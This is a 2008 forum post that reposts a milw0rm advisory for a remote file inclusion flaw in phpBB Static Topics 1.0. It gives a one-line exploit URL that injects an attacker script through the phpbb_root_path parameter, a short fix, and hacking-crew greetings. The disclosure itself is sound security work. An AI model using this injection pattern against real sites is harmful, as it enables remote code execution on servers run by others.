Guest Nemessis Posted April 26, 2008 Report Share Posted April 26, 2008 http://www.milw0rm.com/exploits/2477---------------------------------------------------------------------------phpBB Static Topics <= 1.0 [phpbb_root_path] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : phpBB Static Topicsversion : 1.0URL : http://www.nivisec.com/downloads/phpbb/static_forums.zip------------------------------------------------------------------Exploit:~~~~~Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/includes/functions_static_topics.php?phpbb_root_path=[Evil_Script]---------------------------------------------------------------------------Solution :~~~~~~~declare variabel $phpbb_root_path---------------------------------------------------------------------------Shoutz:~~~# Special greetz to my good friend [Oo]# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]---------------------------------------------------------------------------*/ Quote Link to comment Share on other sites More sharing options...